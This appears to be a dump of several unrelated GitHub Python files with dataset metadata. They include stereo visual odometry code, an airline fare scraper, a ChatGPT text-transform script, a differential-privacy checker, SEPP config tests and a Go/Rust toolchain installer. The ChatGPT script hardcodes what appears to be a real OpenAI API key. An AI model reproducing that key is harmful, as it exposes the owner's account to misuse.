distance between same points in T1 and T2\n for i in range(numPoints):\n for j in range(numPoints):\n T2Dist = np.linalg.norm(Features3d2[i,:] - Features3d2[j,:])\n T1Dist = np.linalg.norm(Features3d1[i,:] - Features3d1[j,:])\n if (abs(T2Dist - T1Dist) < tolerance):\n W[i, j] = 1\n\n return W\n\ndef findMaxClique(W):\n \"\"\" \n Finds maximum clique\n \n Parameters: \n W = Adjacency matrix\n \n Returns: \n Points in maxclique using a greedy approach\n \"\"\"\n maxn = np.argmax(np.sum(W,axis = 1))\n maxc = np.sum(W,axis = 1)[maxn]\n clique = [maxn]\n isin = True\n\n numPoints = W.shape[0]\n while True:\n potentialnodes = list()\n # Find potential nodes which are connected to all nodes in the clique\n for i in range(numPoints):\n for j in range(len(clique)):\n isin = isin & bool(W[i, clique[j]])\n if isin == True and i not in clique:\n potentialnodes.append(i)\n isin=True\n\n count = 0\n maxn = 0\n maxc = 0\n # Find the node which is connected to the maximum number of potential nodes and store in maxn\n for i in range(len(potentialnodes)):\n for j in range(len(potentialnodes)):\n if W[potentialnodes[i], potentialnodes[j]] == 1:\n count = count+1\n if count > maxc:\n maxc = count\n maxn = potentialnodes[i]\n count = 0\n if maxc == 0:\n break\n clique.append(maxn)\n \n if (len(clique) > 100):\n break \n\n\n return clique\n\n\n\ndef generateRotMat(psi, theta, sigma):\n \"\"\" \n generates Rotation matrix \n \n Parameters: \n psi, theta, sigma, rotations about x,y,z, directions\n \n Returns: \n Rotation matrix\n \"\"\"\n mat = np.zeros((3,3))\n mat[0,0] = cos(psi) * cos(sigma) - sin(psi) * cos(theta) * sin(sigma)\n mat[0,1] = -cos(psi) * sin(sigma) - sin(psi) * cos(theta) * cos(sigma)\n mat[0,2] = sin(psi) * sin(theta)\n \n mat[1,0] = sin(psi) * cos(sigma) + cos(psi) * cos(theta) * sin(sigma)\n mat[1,1] = -sin(psi) * sin(sigma) + cos(psi) * cos(theta) * cos(sigma)\n mat[1,2] = -cos(psi) * sin(theta)\n \n mat[2,0] = sin(theta) * sin(sigma)\n mat[2,1] = sin(theta) * cos(sigma)\n mat[2,2] = cos(theta)\n \n return mat\n\ndef loss(dof,d2dPoints1, d2dPoints2, d3dPoints1, d3dPoints2, w2cMatrix):\n \"\"\" \n generate cost for LM \n \n Parameters: \n dof : optimizable parameters\n d2dPoints1 : points in image 1 in 2d\n d2dPoints2 : points in image 1 in 2d\n d3dPoints1 : points in image 2 in 3d\n d3dPoints2 : points in image 2 in 3d\n w2cMatrix : Left projection matrix\n\n Returns: \n loss\n \"\"\"\n perspectiveProj = np.eye(4)\n Rmat = generateRotMat(dof[0], dof[1], dof[2])\n perspectiveProj[:3,:3] = Rmat\n perspectiveProj[0,-1] = dof[3]\n perspectiveProj[1,-1] = dof[4]\n perspectiveProj[2,-1] = dof[5]\n\n numPoints = d2dPoints1.shape[0]\n errorA = np.zeros((numPoints,3))\n errorB = np.zeros((numPoints,3))\n \n forwardProjection = np.matmul(w2cMatrix, perspectiveProj)\n backwardProjection = np.matmul(w2cMatrix, np.linalg.inv(perspectiveProj))\n for i in range(numPoints):\n Ja = np.ones((3))\n Jb = np.ones((3))\n Wa = np.ones((4))\n Wb = np.ones((4))\n \n Ja[0:2] = d2dPoints1[i,:]\n Jb[0:2] = d2dPoints2[i,:]\n Wa[0:3] = d3dPoints1[i,:]\n Wb[0:3] = d3dPoints2[i,:]\n \n JaPred = np.matmul(forwardProjection, Wb)\n JaPred /= JaPred[-1]\n e1 = Ja - JaPred\n \n JbPred = np.matmul(backwardProjection, Wa)\n JbPred /= JbPred[-1]\n e2 = Jb - JbPred\n \n errorA[i,:] = e1\n errorB[i,:] = e2\n \n residual = np.vstack((errorA,errorB))\n return residual.flatten()\n\n\n\n\n\ndef estimateOdometry(img1,img2,Proj1,Proj2,img1_disparity,img2_disparity,feature_detector):\n\n \"\"\" \n main code, which is to be called every loop \n \n Parameters: \n img1 : first pair\n img2 : 2nd pair\n Proj1 : Projection for left cam\n Proj2 : Projection for right cam\n img1_disparity : disparity for 1st frame\n img2_disparity : disparity for 2nd frame\n feature_detector : 0 = FAST, 1 = GFTT\n\n Returns: \n 6d pose, cost\n \"\"\"\n\n #Feature detection\n\n features_1L,features_2L = fastDetect(img1[L],img2[L],feature_detector)\n\n features_1L_3d,features_1R_3d,features_2L_3d,features_2R_3d = featureEliminator(img1_disparity,img2_disparity,features_1L,features_2L)\n\n\n # 3d triangulation\n numPoints = features_1L_3d.shape[0]\n Points3d1 = triangulate3D(features_1L_3d,features_1R_3d,numPoints,Proj1,Proj2)\n Points3d2 = triangulate3D(features_2L_3d,features_2R_3d,numPoints,Proj1,Proj2)\n\n # Eliminate outliers\n\n tol = 0.2\n len_clique = 0\n clique = []\n while len_clique < 6 and Points3d1.shape[0] >= 6:\n # in-lier detection algorithm\n W = generateAdjMatrix(Points3d1,Points3d2,tol)\n clique = findMaxClique(W)\n len_clique = len(clique)\n tol *= 2\n\n \n # pick up clique point 3D coords and features for optimization\n PointsClique3d1 = Points3d1[clique]\n PointsClique3d2 = Points3d2[clique]\n\n # points = features\n features_1L_3d = features_1L_3d[clique]\n features_2L_3d = features_2L_3d[clique]\n\n\n\n if (features_1L_3d.shape[0] >= 6):\n dSeed = np.zeros(6)\n\n optRes = least_squares(loss, dSeed, method='lm', max_nfev=2000,\n args=(features_1L_3d, features_2L_3d, PointsClique3d1, PointsClique3d2, Proj1))\n\n \n error = optRes.fun\n pointsInClique = len(clique)\n e = error.reshape((pointsInClique*2, 3))\n errorThreshold = 0.5\n xRes1 = np.where(e[0:pointsInClique, 0] >= errorThreshold)\n yRes1 = np.where(e[0:pointsInClique, 1] >= errorThreshold)\n zRes1 = np.where(e[0:pointsInClique, 2] >= errorThreshold)\n xRes2 = np.where(e[pointsInClique:2*pointsInClique, 0] >= errorThreshold)\n yRes2 = np.where(e[pointsInClique:2*pointsInClique, 1] >= errorThreshold)\n zRes2 = np.where(e[pointsInClique:2*pointsInClique, 2] >= errorThreshold)\n\n pruneIdx = xRes1[0].tolist() + yRes1[0].tolist() + zRes1[0].tolist() + (xRes2[0] - pointsInClique).tolist() + (yRes2[0] - pointsInClique).tolist() + (zRes2[0] - pointsInClique).tolist()\n if (len(pruneIdx) > 0):\n uPruneIdx = list(set(pruneIdx))\n features_1L_3d = np.delete(features_1L_3d, uPruneIdx, axis=0)\n features_2L_3d = np.delete(features_2L_3d, uPruneIdx, axis=0)\n PointsClique3d1 = np.delete(PointsClique3d1, uPruneIdx, axis=0)\n PointsClique3d2 = np.delete(PointsClique3d2, uPruneIdx, axis=0)\n \n if (features_1L_3d.shape[0] >= 6):\n optRes = least_squares(loss, optRes.x, method='lm', max_nfev=2000,\n args=(features_1L_3d, features_2L_3d, PointsClique3d1, PointsClique3d2, Proj1))\n \n\n return optRes.x, optRes.cost\n\n return [0,0,0,0,0,0],0\n\n\n\nif __name__=='__main__':\n\n\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--seqPath\",required = True,type = str,help='path to kitti sequence directory, for example, ./svo/dataset/sequences/00/')\n parser.add_argument(\"-f\", \"--feature\",default = 'FAST',type = str,choices = ['GFTT','FAST'],help='which feature detector is to be used?')\n parser.add_argument(\"-r\", \"--resultsPath\",required = True,type = str,help='path to file where results are to be stored in kitti format, for example ./results/00.txt')\n args = parser.parse_args()\n \n seq = (args.seqPath)\n feat = args.feature\n\n if(feat == 'GFTT'):\n feat = 1\n else:\n feat = 0\n\n\n start = time.time()\n \n \n PATH = args.seqPath\n\n \n try:\n P0L, P0R = getGt(PATH + 'calib.txt')\n except:\n print(\"CALIB FILE NOT FOUND\")\n exit(1)\n\n \n \n assert (P0L[:,-1]==np.zeros(3)).all() == 1 # first camera translation is zero\n #K = P0L[:,:-1]\n\n curr_transX = 0.0\n curr_transZ = 0.0\n\n f = open(args.resultsPath,\"w\")\n\n RmatGlobal = np.eye(3)\n\n transGlobal = np.zeros(3)\n \n l = len(glob.glob(PATH + \"image_0/*\"))\n print(\"Number of images detected : \",l)\n if(l==0):\n print(\"NO IMAGES FOUND AT \",os.path.join(PATH,\"image_0\"))\n exit(1)\n\n disparityEngine = cv2.StereoSGBM_create(minDisparity = 0,numDisparities=32, blockSize=11,P1= 121*8, P2 = 121*32)\n\n\n for i in range(1,l):\n path1L = PATH + \"image_0/\" + str(i-1).zfill(6) + \".png\"\n path1R = PATH + \"image_1/\" + str(i-1).zfill(6) + \".png\"\n path2L = PATH + \"image_0/\" + str(i).zfill(6) + \".png\"\n path2R = PATH + \"image_1/\" + str(i).zfill(6) + \".png\"\n\n\n if(i==1):\n imageLeft1 = cv2.imread(path1L, 0) \n imageRight1 = cv2.imread(path1R, 0)\n img1_disparity = estDisparity(imageLeft1,imageRight1,disparityEngine)\n else:\n imageLeft1 =imageLeft2\n imageRight1 =imageRight2\n img1_disparity = img2_disparity\n\n imageLeft2 = cv2.imread(path2L, 0)\n imageRight2 = cv2.imread(path2R, 0)\n img2_disparity = estDisparity(imageLeft2,imageRight2,disparityEngine)\n\n dofs, cost = estimateOdometry([imageLeft1,imageRight1],[imageLeft2,imageRight2],P0L,P0R,img1_disparity,img2_disparity,feat)\n\n\n transLocal = np.array([dofs[3],dofs[4],dofs[5]])\n RmatLocal = generateRotMat(dofs[0],dofs[1],dofs[2])\n\n transGlobal += RmatGlobal@transLocal\n\n RmatGlobal = RmatLocal@RmatGlobal\n\n print(\"I : \",i)\n #print(\"X : \",transGlobal[0],\" Y : \", transGlobal[1], \" Z : \", transGlobal[2])\n f.write(\n str(RmatGlobal[0,0]) + \" \" + str(RmatGlobal[0,1]) + \" \" + str(RmatGlobal[0,2]) + \" \" + str(transGlobal[0]) + \" \" \n + str(RmatGlobal[1,0]) + \" \" + str(RmatGlobal[1,1]) + \" \" + str(RmatGlobal[1,2]) + \" \" + str(transGlobal[1]) + \" \" \n + str(RmatGlobal[2,0]) + \" \" + str(RmatGlobal[2,1]) + \" \" + str(RmatGlobal[2,2]) + \" \" + str(transGlobal[2]) + \"\\n\")\n\n f.close()\n end = time.time()\n print(\"Time Per frame = \",(end - start)/l)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"AnandGokhale/CS6790_Project","sub_path":"rt-svo/svo.py","file_name":"svo.py","file_ext":"py","file_size_in_byte":17401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"301074032","text":"# Using code from https://stackoverflow.com/questions/6243276/how-to-get-the-physical-interface-ip-address-from-an-interface\n# By Bruno Romano\n# Modified to include try statement and use variable\nimport socket\nimport fcntl\nimport struct\n\ndef get_ip_address(ifname):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n IP = socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15].encode('utf8'))\n )[20:24])\n except Exception:\n IP = 'error'\n finally:\n return IP\n\nprint(get_ip_address('tun0'))\n","repo_name":"Mind-Surfer/openvpn-qbittorrent","sub_path":"run/getvpnip.py","file_name":"getvpnip.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71647045586","text":"# 查询票价接口2\n# 只可获取一天的最低票价,好处是不需要cookie\nfrom datetime import datetime, timedelta\nimport requests\nfrom constant import *\nfrom time import time\nimport queue\nimport threading\n\nheaders = {\n 'authority': 'm.csair.com',\n 'accept': '*/*',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'cache-control': 'no-cache',\n 'content-type': 'application/json; charset=UTF-8',\n 'origin': 'https://m.csair.com',\n 'referer': 'https://m.csair.com/booking_new/',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36',\n}\n\nparams = {\n 'type': 'MOBILE',\n 'APPTYPE': 'touch',\n 'chanel': 'touch',\n 'lang': 'zh',\n # 获取时间戳并转换为字符串\n '_': str(datetime.now().timestamp()).replace('.', '')[:13],\n # 从时间戳转换为datetime对象,再转换为字符串 #datetime.fromtimestamp(datetime.now().timestamp()).strftime('%Y-%m-%d %H:%M:%S')\n 'timeZone': 'GMT+08:00',\n 'osversion': 'Mozilla-5.0_AppleWebKit-537.36_Chrome-114.0.0.0_Mobile_Safari-537.36',\n}\n\n\n# json_data = {\n# 'depCity': 'TYN',\n# 'arrCity': 'CAN',\n# 'depCityFlag': True,\n# 'arrCityFlag': True,\n# 'newGroupBuyId': 'CSAIRXST02',\n# 'segType': 'S',\n# 'isInter': 'N',\n# 'startDate': '2023-08-20',\n# 'endDate': '2023-08-20',\n# }\n#\n# print(json_data)\n#\n# response = requests.post(\n# 'https://m.csair.com/CSMBP/bookProcess/minPrice/getB2EPriceCalendar',\n# params=params,\n# headers=headers,\n# json=json_data,\n# proxies=PROXIES,\n# )\n#\n# print(response.json())\n\n\ndef get_min_price_a_day(date, dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY):\n \"\"\"\n 查询某一天的最低票价\n :param dep_city: 出发城市代码\n :param arr_city: 到达城市代码\n :param date: 日期\n :return: 最低票价\n \"\"\"\n json_data = {\n 'depCity': dep_city,\n 'arrCity': arr_city,\n 'depCityFlag': True,\n 'arrCityFlag': True,\n 'newGroupBuyId': 'CSAIRXST02',\n 'segType': 'S',\n 'isInter': 'N',\n 'startDate': date,\n 'endDate': date,\n }\n\n response = requests.post(\n 'https://m.csair.com/CSMBP/bookProcess/minPrice/getB2EPriceCalendar',\n params=params,\n headers=headers,\n json=json_data,\n proxies=PROXIES,\n )\n response.raise_for_status() # 如果响应状态码不是200,主动抛出异常\n print(response.json())\n return response.json()['FROMOFLIGHTS'][0]['FLIGHT'][0]['MINPRICE']\n\n\ndef get_min_price_a_day_multi_thread(q, date, dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY):\n \"\"\"\n 查询某一天的最低票价\n :param q: 队列\n :param dep_city: 出发城市代码\n :param arr_city: 到达城市代码\n :param date: 日期\n :return: 最低票价\n \"\"\"\n try:\n q.put((date, get_min_price_a_day(date, dep_city, arr_city)))\n except Exception as e:\n print(e)\n\n\ndef get_min_price(dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY, start_date=None, end_date=None):\n \"\"\"\n 查询某一段时间内的最低票价(非多线程)\n :param dep_city: 出发城市代码\n :param arr_city: 到达城市代码\n :param start_date: 开始日期\n :param end_date: 结束日期\n :return: 最低票价\n \"\"\"\n if start_date is None:\n # 如果没有指定开始日期,则默认为7天后\n start_date = (datetime.now() + timedelta(days=7)).strftime('%Y-%m-%d')\n\n # 如果没有指定结束日期,则默认为开始日期后14天\n if end_date is None:\n end_date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=13)).strftime('%Y-%m-%d')\n\n # 得出查询���期区间长度\n date_range = (datetime.strptime(end_date, '%Y-%m-%d') - datetime.strptime(start_date, '%Y-%m-%d')).days + 1\n\n min_prices = []\n for i in range(date_range):\n date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=i)).strftime('%Y-%m-%d')\n min_prices.append((date, get_min_price_a_day(date, dep_city, arr_city)))\n\n return min_prices\n\n\ndef get_min_price_multi_thread(dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY, start_date=None, end_date=None):\n \"\"\"\n 查询某一段时间内的最低票价(多线程)\n :param dep_city: 出发城市代码\n :param arr_city: 到达城市代码\n :param start_date: 开始日期\n :param end_date: 结束日期\n :return: 最低票价\n \"\"\"\n if start_date is None:\n # 如果没有指定开始日期,则默认为7天后\n start_date = (datetime.now() + timedelta(days=7)).strftime('%Y-%m-%d')\n\n # 如果没有指定结束日期,则默认为开始日期后14天\n if end_date is None:\n end_date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=13)).strftime('%Y-%m-%d')\n\n # 得出查询日期区间长度\n date_range = (datetime.strptime(end_date, '%Y-%m-%d') - datetime.strptime(start_date, '%Y-%m-%d')).days + 1\n\n min_prices = []\n threads = []\n q = queue.Queue()\n for i in range(date_range):\n date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=i)).strftime('%Y-%m-%d')\n t = threading.Thread(target=get_min_price_a_day_multi_thread, args=(q, date, dep_city, arr_city))\n threads.append(t)\n t.start()\n\n for t in threads:\n t.join()\n\n while not q.empty():\n min_prices.append(q.get())\n\n min_prices.sort(key=lambda x: datetime.strptime(x[0], '%Y-%m-%d'))\n return min_prices\n\n\nif __name__ == '__main__':\n start_time = time()\n print(get_min_price_multi_thread(start_date='2023-08-20', end_date='2023-08-28'))\n print(time() - start_time)\n","repo_name":"sunset-under-forest/Air_tickets","sub_path":"CSAir/api/api2.py","file_name":"api2.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39127952989","text":"import os\nimport openai\n\nopenai.api_key = \"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\"\n\ntxt = \"여우가 게으른 개를 뛰어 넘었다\"\nmode = \"flask\"\n\nchange = {\n \"낚시\":\"다음 문장을 낚시성 스타일로 바꿔주세요 \",\n \"영어\" : \"다음 문장을 영어로 번역해 주세요 \",\n \"flask\" : \"다음 문장을 출력하는 플라스크 코드를 출력해줘\",\n \"random\" : \"다음 문장을 문자 한글자 별로 순서를 뒤죽박죽 섞어줘\"\n}\n\nprompt = change[mode] + \"\\n\" + txt\n\nmessages = []\n\nmessages.append({\"role\": \"user\", \"content\": prompt})\ncompletion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\", messages=messages)\n\nres= completion.choices[0].message['content']\nprint(\"원문 : \" + txt.strip())\nprint(f\"변환({mode}) : \" + res)","repo_name":"agape1225/lectures","sub_path":"python web framework/week11/[11]chatgpt/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22671097896","text":"from opacus.privacy_analysis import compute_rdp, get_privacy_spent\n\n\ndef check_privacy(args):\n\n orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n\n delta = 1.0 / args.n_client_data\n sample_rate = args.batch_size / args.n_client_data\n noise_multiplier = args.noise_multiplier\n\n steps = args.n_rounds * args.n_epochs / sample_rate\n\n rdps = compute_rdp(sample_rate, noise_multiplier, steps, orders)\n epsilon, alpha = get_privacy_spent(orders, rdps, delta)\n\n return epsilon, alpha\n","repo_name":"layer6ai-labs/ProxyFL","sub_path":"privacy_checker.py","file_name":"privacy_checker.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"48"} +{"seq_id":"4823475130","text":"'''\nCreated on Oct 2, 2012\n\n@author: smirarab\n'''\nimport unittest\nimport sys\n\nfrom sepp.config import options\nfrom sepp import config\nimport os\nimport io\ntry:\n filetypes = (io.IOBase, file)\nexcept NameError:\n filetypes = io.IOBase\nfrom sepp.filemgr import get_data_path\nfrom tempfile import mkstemp\nfrom sepp.scheduler import JobPool\nfrom multiprocessing import cpu_count\n\n\nclass Test(unittest.TestCase):\n fp_config = None\n\n def setUp(self):\n _, self.fp_config = mkstemp()\n\n def tearDown(self):\n os.remove(self.fp_config)\n\n def testConfigFile(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n # Diasable main config path for this test\n config.main_config_path = self.fp_config\n\n sys.argv = [\n sys.argv[0], \"-A\", \"2\",\n \"-c\", get_data_path(\"configs/test.config\"),\n \"--outdir\", \"dir_form_commandline\"]\n\n assert options().alignment_size == 2, \\\n \"Commandline option -A not read properly\"\n\n assert isinstance(options().config_file, filetypes) and \\\n options().config_file.name.endswith(\"data/configs/test.config\"), \\\n \"Commandline option -c not read properly\"\n\n assert (options().pplacer is not None and\n options().pplacer.path == \"pplacer\"), \\\n \"config file options not read properly\"\n\n assert options().placement_size == 10, \\\n \"Config file option placementSize not read properly\"\n\n assert options().outdir.endswith(\"dir_form_commandline\"), \\\n \"Config file value outdir is not properly overwritten:%s \" % \\\n options().outdir\n\n assert options().tempdir is not None, \\\n \"Default value not properly set for tempfile attribute\"\n\n def testConfigFileMissingFile(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n # Diasable main config path for this test\n config.main_config_path = self.fp_config\n\n sys.argv = [sys.argv[0],\n \"-c\", get_data_path(\"configs/test2.config\"),\n \"-f\", get_data_path(\"simulated/test.fas\"),\n \"-a\", get_data_path(\"simulated/test.small.fas\")]\n assert isinstance(options().config_file, filetypes) and \\\n options().config_file.name.endswith(\n \"data/configs/test2.config\"), \\\n \"Commandline option -c not read properly\"\n\n assert isinstance(options().alignment_file, filetypes) and\\\n options().alignment_file.name.endswith(\n \"data/simulated/test.small.fas\"), \\\n \"Config file option alignment not read properly\"\n\n assert isinstance(options().fragment_file, filetypes) and\\\n options().fragment_file.name.endswith(\n \"data/simulated/test.fas\"), \\\n \"Command-line option -f alignment not read properly\"\n\n def testMainConfigFile(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n\n sys.argv = [sys.argv[0], \"-c\", get_data_path(\"configs/test2.config\")]\n # set pplacer filepath to a file shipped with the code base\n options().pplacer.path = get_data_path(\n \"../../../tools/bundled/Darwin/pplacer\")\n\n assert (options().pplacer is not None and os.path.exists(\n options().pplacer.path)), \\\n (\"main config file options not read properly,\"\n \"or nonexistent binaries: pplacer = %s\" %\n options().pplacer.path)\n\n options().hmmalign.path = get_data_path(\n \"../../../tools/bundled/Darwin/hmmalign\")\n assert (options().hmmalign is not None and os.path.exists(\n options().hmmalign.path)), \\\n (\"main config file options not read properly, or nonexistent \"\n \"binaries: hmmalign = %s\" % options().hmmalign.path)\n\n options().hmmsearch.path = get_data_path(\n \"../../../tools/bundled/Darwin/hmmsearch\")\n assert (options().hmmsearch is not None and os.path.exists(\n options().hmmsearch.path)), \\\n (\"main config file options not read properly, or nonexistent \"\n \"binaries: hmmsearch = %s\" % options().hmmsearch.path)\n\n def testCpuCount(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n # Disable main config path for this test\n config.main_config_path = self.fp_config\n JobPool().terminate()\n JobPool().__init__(7)\n sys.argv = [sys.argv[0], \"-x\", \"7\"]\n\n assert options().cpu == 7, \"Commandline option -x not read properly\"\n\n # clean up after test:\n # 1) the JobPool CPU counts needs to be reset to the default\n # 2) the command line arguments must be restored\n JobPool().terminate()\n JobPool().__init__(cpu_count())\n sys.argv = [sys.argv[0], \"-x\", str(cpu_count())]\n config._options_singelton = None\n options()\n\n def testLog(self):\n\n import logging\n import sepp.jobs\n\n sdb = sepp._DEBUG\n\n sepp._DEBUG = True\n sepp.reset_loggers()\n sepp.jobs._LOG.debug(\"test debugging works\")\n assert(sepp.jobs._LOG.getEffectiveLevel() == logging.DEBUG)\n\n sepp._DEBUG = False\n sepp.reset_loggers()\n sepp.jobs._LOG.debug(\"test debugging is disabled\")\n assert(sepp.jobs._LOG.getEffectiveLevel() == logging.INFO)\n\n sepp._DEBUG = sdb\n sepp.reset_loggers()\n\n\nif __name__ == \"__main__\":\n # import sys;sys.argv = ['', 'Test.testConfigFile']\n unittest.main()\n","repo_name":"smirarab/sepp","sub_path":"test/unittest/testConfig.py","file_name":"testConfig.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"48"} +{"seq_id":"39062007644","text":"'''\nModule for installing the configured toolchains for the project\n'''\n\nimport os\nimport shutil\nimport subprocess\nimport tarfile\nfrom copy import deepcopy\nfrom dataclasses import dataclass\n\nfrom typing_extensions import Self\n\nfrom project_generator.lib.distromngr import Distribution\nfrom project_generator.lib.toolchain import Toolchain\nfrom project_generator.lib.utils.command import CommandBuilder\n\nfrom ._util import (_download_go_toolchain, _download_rust_toolchain,\n _install_tools_packages)\n\n\n@dataclass(slots=True)\nclass Installer:\n '''\n Class for exposing operations for installing packages\n '''\n\n _distribution: Distribution\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n Install the relevant packages based on the toolchain\n '''\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n Install common accompanying addtional tools for each toolchain\n '''\n\n\n@dataclass(slots=True)\nclass _CToolchainInstaller(Installer):\n '''\n C Toolchain installer\n '''\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n C toolchain installer\n '''\n\n pkg_list = Toolchain.C.packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n C additional tools installer\n '''\n\n pkg_list = Toolchain.C.extra_packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _CppToolchainInstaller(Installer):\n '''\n C++ Toolchain installer\n '''\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n C++ toolchain installer\n '''\n\n pkg_list = Toolchain.CPP.packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n C++ additional tools installer\n '''\n\n pkg_list = Toolchain.CPP.extra_packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _GtkToolchainInstaller(Installer):\n '''\n Gtk Toolchain installer\n '''\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n Gtk toolchain installer\n '''\n\n pkg_list = Toolchain.GTK.packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n Gtk additional tools installer\n '''\n\n pkg_list = Toolchain.GTK.extra_packages_for(self._distribution)\n return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _GoToolchainInstaller(Installer):\n '''\n Go Toolchain installer\n '''\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n Go toolchain installer\n '''\n\n go_tar_file = _download_go_toolchain()\n\n go_root: str = None\n\n if path is not None and path != \"\":\n go_root = path\n else:\n go_root = os.getenv('GOROOT')\n if go_root is None or go_root == \"\":\n go_root = \"/usr/local/sdks/go\"\n\n extract_path = \"/tmp/golang\"\n\n tar_handler = tarfile.TarFile.gzopen(go_tar_file, 'r')\n tar_handler.extractall(extract_path)\n\n filenames = tar_handler.getnames()\n\n extracted_path = deepcopy(extract_path)\n\n common_path = os.path.commonpath(filenames)\n if common_path.startswith(\".\") is False:\n extracted_path = os.path.join(extracted_path, common_path)\n\n shutil.rmtree(go_root, True, None)\n os.makedirs(os.path.dirname(go_root), exist_ok=True)\n shutil.move(extracted_path, go_root)\n\n os.remove(go_tar_file)\n\n return 0\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n Go additional tools installer\n '''\n\n go_tools_list = [\n 'github.com/cweill/gotests/gotests@latest',\n 'github.com/fatih/gomodifytags@latest',\n 'github.com/josharian/impl@latest',\n 'github.com/haya14busa/goplay/cmd/goplay@latest',\n 'github.com/go-delve/delve/cmd/dlv@latest',\n 'honnef.co/go/tools/cmd/staticcheck@latest',\n 'golang.org/x/tools/gopls@latest',\n 'github.com/ramya-rao-a/go-outline@latest'\n ]\n\n for tool in go_tools_list:\n cmd = CommandBuilder() \\\n .program('go') \\\n .arg('install') \\\n .arg(tool) \\\n .build()\n\n ret = cmd.run()\n if ret != 0:\n raise subprocess.CalledProcessError(\n ret, ' '.join(cmd.flatten()))\n\n return 0\n\n\n@dataclass(slots=True)\nclass _RustToolchainInstaller(Installer):\n '''\n Rust Toolchain installer\n '''\n\n def install_toolchain(self, path: str = None) -> int:\n '''\n Rust toolchain installer\n '''\n\n rustup_init_bin = _download_rust_toolchain()\n\n os.chmod(rustup_init_bin, 0o755)\n\n cmd = CommandBuilder().program(rustup_init_bin).option(\"-y\").build()\n ret = cmd.run()\n if ret != 0:\n raise subprocess.CalledProcessError(ret, ' '.join(cmd.flatten()))\n\n os.remove(rustup_init_bin)\n\n return ret\n\n def install_additional_tools(self, path: str = None) -> int:\n '''\n Rust additional tools installer\n '''\n\n cmd = CommandBuilder() \\\n .program('rustup') \\\n .arg('component') \\\n .arg('add') \\\n .arg('rust-analyzer') \\\n .build()\n\n ret = cmd.run()\n if ret != 0:\n raise subprocess.CalledProcessError(ret, ' '.join(cmd.flatten()))\n\n return ret\n\n\n@dataclass(slots=True)\nclass ToolchainInstaller:\n '''\n Installs a given toolchain for the specified distro\n '''\n\n distribution: Distribution\n toolchain: Toolchain\n install_path: str = \"\"\n additional_tools: bool = False\n\n def run(self) -> int:\n '''\n Run the constructed installer\n '''\n\n if self.toolchain is None or self.toolchain not in Toolchain:\n raise ValueError(\n f\"Invalid or unsupported toolchain '{self.toolchain}' specified\")\n\n if self.toolchain not in [Toolchain.GO, Toolchain.RUST] and \\\n (self.distribution is None or self.distribution not in Distribution):\n raise ValueError(\n f\"Distribution not specified for '{self.toolchain.value}' toolchain\")\n\n installer = None\n if self.toolchain == Toolchain.C:\n installer = _CToolchainInstaller(self.distribution)\n elif self.toolchain == Toolchain.CPP:\n installer = _CppToolchainInstaller(self.distribution)\n elif self.toolchain == Toolchain.GTK:\n installer = _GtkToolchainInstaller(self.distribution)\n elif self.toolchain == Toolchain.GO:\n installer = _GoToolchainInstaller(self.distribution)\n elif self.toolchain == Toolchain.RUST:\n installer = _RustToolchainInstaller(self.distribution)\n\n ret = installer.install_toolchain()\n if ret != 0:\n return ret\n\n if self.additional_tools:\n ret = installer.install_additional_tools()\n\n return ret\n\n\n@dataclass(slots=True)\nclass ToolchainInstallerBuilder:\n '''\n Get the installer based on inputs\n '''\n _toolchain_installer: 